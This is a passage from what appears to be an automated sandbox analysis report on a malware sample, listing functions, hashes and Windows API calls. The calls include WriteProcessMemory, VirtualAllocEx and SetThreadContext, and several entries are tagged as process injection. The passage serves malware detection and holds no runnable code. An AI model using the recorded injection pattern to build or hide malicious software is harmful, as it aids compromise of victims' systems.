1682->1650 1682->1679 1690 f812d3-f812e7 1682->1690 1684->1685 1692 f81569-f8156e 1684->1692 1693 f8155b-f81560 1684->1693 1694 f8154d-f81552 1684->1694 1695 f81570-f81575 1684->1695 1696 f81562-f81567 1684->1696 1697 f81542-f81544 1684->1697 1698 f81554-f81559 1684->1698 1699 f81546-f8154b 1684->1699 1700 f81577-f8157c 1684->1700 1702 f81581-f81582 1685->1702 1687->1688 1688->1652 1690->1647 1692->1702 1693->1702 1694->1702 1695->1702 1696->1702 1697->1702 1698->1702 1699->1702 1700->1702 1719 f81269-f8127c 1709->1719 1720 f8127e-f81291 1709->1720 1710->1709 1723 f812b3 1719->1723 1725 f8129a 1720->1725 1726 f81293-f81298 1720->1726 1733 f812b3 call f815d0 1723->1733 1734 f812b3 call f815c0 1723->1734 1728 f8129c-f8129e 1725->1728 1726->1728 1727 f812b9 1727->1681 1728->1690 1729 f812a0-f812b1 1728->1729 1729->1723 1731->1660 1732->1660 1733->1727 1734->1727
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: a18c9147c46f17aad674db2c0b53f29fa7fabd0b639f5eef72c10fae3e9dfc99
                                              • Instruction ID: b13cfc7c4509b04ea1a4fb4087ac4c7e50fb7edf396ad1e10cd9a0746c4a76a8
                                              • Opcode Fuzzy Hash: a18c9147c46f17aad674db2c0b53f29fa7fabd0b639f5eef72c10fae3e9dfc99
                                              • Instruction Fuzzy Hash: 7FE1A135B08144CFD704DB78D8A8BAD7BB6FF89310F2545A9E406DB3A1CA34DC46AB51
                                              Function 056F95F0 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 056F96CB
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 04f52347beac1933c1faa5b43d45bc87c69e7cbac6c57ac5a9298fa39913c7c7
                                              • Instruction ID: 091e38ee8865e6d9ee03640659549dd5a400642cc0028518c5b1ab27edd205fc
                                              • Opcode Fuzzy Hash: 04f52347beac1933c1faa5b43d45bc87c69e7cbac6c57ac5a9298fa39913c7c7
                                              • Instruction Fuzzy Hash: BA41BAB5D012589FDF00CFA9D984ADEBBF1BF49310F10942AE419B7200D774AA45CF54
                                              Function 056F95F8 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 056F96CB
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: c3ec0d8f73b097ea799f6c0367c81c3b01c4fd888388839dd466562f936c7b6e
                                              • Instruction ID: 0adc9b2cfe4ada87e226ee59e9147a74b35caa44f9ac0e302dd0e5f41dc37003
                                              • Opcode Fuzzy Hash: c3ec0d8f73b097ea799f6c0367c81c3b01c4fd888388839dd466562f936c7b6e
                                              • Instruction Fuzzy Hash: CB41BAB5D012589FDF00CFA9D984ADEFBF1BB49310F10902AE919B7210D774AA45CF64
                                              Function 056F92F0 Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 056F93A2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: f0cb8b3ada2a954c1370464d2fb79b22fc8f0966efbdb840258d7014f78c80a2
                                              • Instruction ID: bf2ef35bfaeeca19f17fa93c42eb88154332d784c94d855aca78568aaf421cd2
                                              • Opcode Fuzzy Hash: f0cb8b3ada2a954c1370464d2fb79b22fc8f0966efbdb840258d7014f78c80a2
                                              • Instruction Fuzzy Hash: 7E31A6B9D002589FCF10CFA9D984ADEFBB1BF49310F10A42AE915B7200D735A901CF68
                                              Function 056F92F8 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 056F93A2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 8221367b2f479c049657abd12359a540e3111c192183bb1014c2ca430f56b44c
                                              • Instruction ID: 2cf0ed721aef01df6ded545d3016a7e2f5d12ddf9d12aa28363ab79c94823b1e
                                              • Opcode Fuzzy Hash: 8221367b2f479c049657abd12359a540e3111c192183bb1014c2ca430f56b44c
                                              • Instruction Fuzzy Hash: BB3195B9D04258DFCF10CFA9D984A9EFBB1BB49310F10A42AE915B7200D775A905CF68
                                              Function 056F8830 Relevance: 1.6, APIs: 1, Instructions: 97threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 056F88E7
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 426e8fd422c8be41e038cb48ba17934c235d9c7660db88997e677c2339c5feb5
                                              • Instruction ID: 7c10d8c4fb399257fc63dcf87af75566db1b3f9ff8a329ee70d5ca4ec318d137
                                              • Opcode Fuzzy Hash: 426e8fd422c8be41e038cb48ba17934c235d9c7660db88997e677c2339c5feb5
                                              • Instruction Fuzzy Hash: 8941CBB5D012589FDF10CFAAD885AEEBBF1BF48310F24802AE518B7240D778A945CF64
                                              Function 0557D930 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0557D9D4
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2397433503.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5570000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 89df19a106ad821e851e3e48d2b0bfb78d9c2566ced3261e1b099209466c02c0
                                              • Instruction ID: 90936055db43afbe16b720673bc77ed0ec2d1181c2d0254bb7b4e54b772494ba
                                              • Opcode Fuzzy Hash: 89df19a106ad821e851e3e48d2b0bfb78d9c2566ced3261e1b099209466c02c0
                                              • Instruction Fuzzy Hash: 5C31C8B4D002489FCF10CFA9D980A9EFBF0BF48310F14902AE819B7200D775A945CF94
                                              Function 04F9E198 Relevance: 1.6, Strings: 1, Instructions: 345COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2395215825.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_4f90000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: d
                                              • API String ID: 0-2564639436
                                              • Opcode ID: 5f0c062156e0d726addd24abf06d3cb1a8dcc0d8c3d8114da9bc0be747074893
                                              • Instruction ID: 9da0d656ad6f3a8126c1dc93b1156dc14de494fbefef5dc3222fdde066f1f417
                                              • Opcode Fuzzy Hash: 5f0c062156e0d726addd24abf06d3cb1a8dcc0d8c3d8114da9bc0be747074893
                                              • Instruction Fuzzy Hash: F3D16A34700606CFEB14CF28C484A6AB7F2FF88310B558969E55A9B3A1DB34FC46CB91
                                              Function 056F8838 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 056F88E7
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: d1125801b87f6ab9847fe273aff1e0afef05ebaf396b40dbc28736df5fd5b115
                                              • Instruction ID: 224c0ca8fbf733eefa8010b7ec950dd83ed507626cf1844ea444f0f0b0bb0fff
                                              • Opcode Fuzzy Hash: d1125801b87f6ab9847fe273aff1e0afef05ebaf396b40dbc28736df5fd5b115
                                              • Instruction Fuzzy Hash: C131BAB5D012589FDB10CFAAD885AEEBBF1BF48310F24802AE419B7240D778A945CF64
                                              Function 056E2030 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399309198.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56e0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 49f426c061a4ac09cf4b72dabc63b075883d216d72751376c6e48494009e8f71
                                              • Instruction ID: d1c005e73d4bbbaa3a0afefb3167410beec7fa10c8f38e9165346dd6cdc968ed
                                              • Opcode Fuzzy Hash: 49f426c061a4ac09cf4b72dabc63b075883d216d72751376c6e48494009e8f71
                                              • Instruction Fuzzy Hash: 3F31FBB4D012189FCF10CFA9D880AAEFBF5BB49310F14942AE815B7240C739A945CFA4
                                              Function 056E2038 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399309198.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56e0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: a6a8830225bdbbfca8836b4438ea4ad1c8c220e212831c039eba02b19829c69c
                                              • Instruction ID: 72f903661412723b4409e13fad2895e1f24e7acf380debc5c4ed4fbbad1d83aa
                                              • Opcode Fuzzy Hash: a6a8830225bdbbfca8836b4438ea4ad1c8c220e212831c039eba02b19829c69c
                                              • Instruction Fuzzy Hash: 1931DAB4D022189FDF10CFA9D880AEEFBF5BB49310F14942AE805B7240C779A945CFA4
                                              Function 0557EA68 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0557EB07
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2397433503.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5570000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 764ebbcee4871f9b36a89a81326996065526a9132865ade085e6e5d4908e3a19
                                              • Instruction ID: 8d1e12878cf4fdf60d27835f075e96bc2a37834145d04b91503a006bacb325b8
                                              • Opcode Fuzzy Hash: 764ebbcee4871f9b36a89a81326996065526a9132865ade085e6e5d4908e3a19
                                              • Instruction Fuzzy Hash: B231B8B4D01248DFDF10CFA9E884A9EFBB5BF49310F20942AE819B7210DB75A945CF94
                                              Function 05718181 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: N$EL
                                              • API String ID: 0-2544871637
                                              • Opcode ID: 77698ac2a05c4e2a7d3c8639e7ccd72f32e57d8f7d9e79881509e6238ff90a7f
                                              • Instruction ID: e2fe8ff60f925a23ebc5a0fc56fe46a88d14520690fb4d1d4780fa68744ffd39
                                              • Opcode Fuzzy Hash: 77698ac2a05c4e2a7d3c8639e7ccd72f32e57d8f7d9e79881509e6238ff90a7f
                                              • Instruction Fuzzy Hash: 4E312871E141088FDB04EFAAD844AEEBBF6FB89300F108169D815A7344D7789A419F95
                                              Function 05718190 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: N$EL
                                              • API String ID: 0-2544871637
                                              • Opcode ID: 5fd48c33e12eb080431c60bb1ac5addfc53e79dfadc0ea6dfb4319b8ce1b0940
                                              • Instruction ID: 82000ce2d4d613e7066ced237c68ea8bc8644d8135fb4841f0e4874b0744d021
                                              • Opcode Fuzzy Hash: 5fd48c33e12eb080431c60bb1ac5addfc53e79dfadc0ea6dfb4319b8ce1b0940
                                              • Instruction Fuzzy Hash: 3A31F871E141088FDB04EFAAD884AEEBBF6EB8D300F108169D815A7354DB749A41EF95
                                              Function 05815FD9 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399639540.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5810000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: <
                                              • API String ID: 0-4251816714
                                              • Opcode ID: 5c1b8b7ce5004c012f734b83ca53630619e6949a1fcfa1883af9af11c07b6411
                                              • Instruction ID: 583ef02b82590fbe2b9235e9ae66a12d4d7dfb0066b60b9709459c46aecc0287
                                              • Opcode Fuzzy Hash: 5c1b8b7ce5004c012f734b83ca53630619e6949a1fcfa1883af9af11c07b6411
                                              • Instruction Fuzzy Hash: BE217278D012698FCB64EF28D884AD9B7B1FB49300F1081EAD929E7344D7786E919F04
                                              Function 05816A42 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399639540.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5810000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: f
                                              • API String ID: 0-1993550816
                                              • Opcode ID: 6b4271dcf990deded9abb29d64dd1fabd424389bcfdd1ca6f51f5796793fc327
                                              • Instruction ID: fdafce14f23196bd2e75190d5e6011c88ed9519ee2ec5348578b6047c4ef55ae
                                              • Opcode Fuzzy Hash: 6b4271dcf990deded9abb29d64dd1fabd424389bcfdd1ca6f51f5796793fc327
                                              • Instruction Fuzzy Hash: 4A011334A4426ACFCB64CF18CD88BA8BBB0BB05314F2244E5DC19A7A10DB749EC8CF15
                                              Function 058169AE Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399639540.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5810000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: f
                                              • API String ID: 0-1993550816
                                              • Opcode ID: 0becc485cde6237939ab95691924703f7d68891e40d26c615e978b8da7da41e0
                                              • Instruction ID: e2f1aca286087cac8510392aa042cd92f3635e10fb66a19f3a5202a465ad08d7
                                              • Opcode Fuzzy Hash: 0becc485cde6237939ab95691924703f7d68891e40d26c615e978b8da7da41e0
                                              • Instruction Fuzzy Hash: E9F01730A0422ACFDB20EB18DC8DBA976B5FB05304F2140E9981EA7A45DB795EC5CF16
                                              Function 05713895 Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 5
                                              • API String ID: 0-2226203566
                                              • Opcode ID: 5fba05f3ee64bdf84103a2127e0202cae3941a6cc4eec6570c88bda3633ea556
                                              • Instruction ID: fd87e10e43f576de0445881c6b077eb5bf6ace25c11443dd5df73e7c71bde3c4
                                              • Opcode Fuzzy Hash: 5fba05f3ee64bdf84103a2127e0202cae3941a6cc4eec6570c88bda3633ea556
                                              • Instruction Fuzzy Hash: 07F0AF70911228CFEB66DF18DC99B99BBB5BB46301F0040D9980DA2250DBB44BC6AF55
                                              Function 0571219E Relevance: 1.3, Strings: 1, Instructions: 13COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: P
                                              • API String ID: 0-3110715001
                                              • Opcode ID: 1656800c7bdde08b7eb2e52490823e4c428fda33e723a7bf3cbaf51fccdf7380
                                              • Instruction ID: cdd8ee9d4c14d7bc7e9f90cb93abbfe818be1506933832120358d66f321432b8
                                              • Opcode Fuzzy Hash: 1656800c7bdde08b7eb2e52490823e4c428fda33e723a7bf3cbaf51fccdf7380
                                              • Instruction Fuzzy Hash: 82D05B70621318CFCB54EF65D49475E77B6F7C4310F009544850A67314D7345E456F95
                                              Function 00F83F96 Relevance: 1.3, Strings: 1, Instructions: 7COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: jjjjjj
                                              • API String ID: 0-3900813449
                                              • Opcode ID: 25ecf0cad92ca4710ee33dbf86ce18e7825958005bbf0d8200beb346e44aa6ff
                                              • Instruction ID: 3b42bb586b8d8a71b001ef93badce306662b26de2e8517e1759c4fe690c3400e
                                              • Opcode Fuzzy Hash: 25ecf0cad92ca4710ee33dbf86ce18e7825958005bbf0d8200beb346e44aa6ff
                                              • Instruction Fuzzy Hash: 0FB0922280E381CE87025A9484D51A0BF64AA62280328C0EAC8850E157D4588996F362
                                              Function 051A1718 Relevance: .7, Instructions: 677COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2396175651.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_51a0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 52c74f1819c22f7066897ad5c97ab2425656d4ee8f6d7917b3193f17c422b1c6
                                              • Instruction ID: 8a7ce6f5dd7efbe8a1d85a1af91b8b273862d2bb243be475b1ff8ae3d368125d
                                              • Opcode Fuzzy Hash: 52c74f1819c22f7066897ad5c97ab2425656d4ee8f6d7917b3193f17c422b1c6
                                              • Instruction Fuzzy Hash: 045219B5A002289FDB25DB68C985BEDBBF2BF88300F1541D9E509A7351DB349E81CF61
                                              Function 04F71EA8 Relevance: .6, Instructions: 577COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2395099871.0000000004F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_4f70000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0db7c413220710fe1fa8f124a3061e9747222f78d7080a9e331f49817a3cf4ea
                                              • Instruction ID: a44be480e8adb70974e13b334d5474d4f71a65d4faf5f1a7a94a84ac1707fd3f
                                              • Opcode Fuzzy Hash: 0db7c413220710fe1fa8f124a3061e9747222f78d7080a9e331f49817a3cf4ea
                                              • Instruction Fuzzy Hash: 0542E374E0420DCFEB14DFA8D448AAEBBB2FB88304F11805AD912A7354DB78AD56DF51
                                              Function 00F81E2D Relevance: .6, Instructions: 552COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ef60651545fb37a0d38329c822f46f7ec4089756811e8eb2fb25984804de39d9
                                              • Instruction ID: 3dc8dfefd5536e0a645247b510ca892b1940ad1fb07cebfd8f1ff5a5819aa804
                                              • Opcode Fuzzy Hash: ef60651545fb37a0d38329c822f46f7ec4089756811e8eb2fb25984804de39d9
                                              • Instruction Fuzzy Hash: 5A420974A01201CFD751EF54D648AA8BBB1FB41314F5AC199D0694F2AAD377EC8AEF80
                                              Function 00F81FF8 Relevance: .5, Instructions: 536COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f0edf5be0fc941ec6bb6b432090981cecf85d82ecc929ca9b173ddc1bb1fcd9c
                                              • Instruction ID: af46a33ee64e5f414b096b52adbe27ce927cfa11586688dea73670e53154861a
                                              • Opcode Fuzzy Hash: f0edf5be0fc941ec6bb6b432090981cecf85d82ecc929ca9b173ddc1bb1fcd9c
                                              • Instruction Fuzzy Hash: FE42E974A01206CFD751EF44D648AA8BBF2FB40315F59C199D0694F2AAD376EC89EF80
                                              Function 04F9BBC0 Relevance: .5, Instructions: 534COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2395215825.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_4f90000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dc5509d242e4f980974e0cc516057732b0b57880297694679ab7f952347e1915
                                              • Instruction ID: 8267b8a4e6924a82c0e28f172ea7e5604029f63dbfeaa8b2512efe80ab0b38ba
                                              • Opcode Fuzzy Hash: dc5509d242e4f980974e0cc516057732b0b57880297694679ab7f952347e1915
                                              • Instruction Fuzzy Hash: 0C225B75B002159FEB04DFA8E894A69B7F6FF88300F148059E905AB3A1DB75ED41CB90
                                              Function 04F72EB8 Relevance: .5, Instructions: 488COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2395099871.0000000004F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_4f70000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f2282d64fb03d1d2be9624bb4a9f920f7ce2708f14692804ee3dd85a6025580b
                                              • Instruction ID: 425d03d0da4ed27a40059bc36d537c360328c08ef92ab4e2f2ce35be36b82523
                                              • Opcode Fuzzy Hash: f2282d64fb03d1d2be9624bb4a9f920f7ce2708f14692804ee3dd85a6025580b
                                              • Instruction Fuzzy Hash: F7221774E41218CFDB29DFE4D4546ADBBB2FF49305F10846AD40AAB245DB39AE86DF00
                                              Function 04F9EAE8 Relevance: .5, Instructions: 478COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2395215825.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_4f90000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 495b6fd208369f5cc6ff57fb4079f9454e2c2c15eb16fad429831d209aee4b86
                                              • Instruction ID: d213f0fb5c486067ad38b766202d9678572efab9d6f09bbd2dca4590d737cfb6
                                              • Opcode Fuzzy Hash: 495b6fd208369f5cc6ff57fb4079f9454e2c2c15eb16fad429831d209aee4b86
                                              • Instruction Fuzzy Hash: 5F124B71B002059FEB24DFA5D894A6EB7F2FF88304B148529E506AB391DB75EC46CB50
                                              Function 051A4728 Relevance: .4, Instructions: 437COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2396175651.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_51a0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0b15f0e9f8d2ef6deaddf0129f5f63c671e56db4b214c996dc03f09760626e5e
                                              • Instruction ID: f8bf2bd084bf8041ebe5229c40b9e48fd3943510949acd7c08a80c34627158eb
                                              • Opcode Fuzzy Hash: 0b15f0e9f8d2ef6deaddf0129f5f63c671e56db4b214c996dc03f09760626e5e
                                              • Instruction Fuzzy Hash: DA12E939B002198FDB15EF64C898B9DB7B2BF89300F5185A8D54AAB355DF70AD85CF40
                                              Function 00F81FE9 Relevance: .4, Instructions: 402COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6e32d061d9ec89e51f11de5217d3422cf8f19188fa93e51c00fbd831695a403e
                                              • Instruction ID: c03dcb566aeda95ebe940b61b529ff441f9a2f63f655409548b9f6d2f48ca196
                                              • Opcode Fuzzy Hash: 6e32d061d9ec89e51f11de5217d3422cf8f19188fa93e51c00fbd831695a403e
                                              • Instruction Fuzzy Hash: 70128774A02201CFD755EF44D648AA8BBE1FB41315F49C199D0694F2AAD377E889EF80
                                              Function 051A0830 Relevance: .4, Instructions: 370COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2396175651.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_51a0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 98dec8fbfdeeedbfd0be0bb55f6f2eb9d35dbaaf9efffd093dcd149bf6bb48f8
                                              • Instruction ID: 125e81bc57a299b26cadcd3bfd0a790dab194717bb0366e2527598d9a54e2cdc
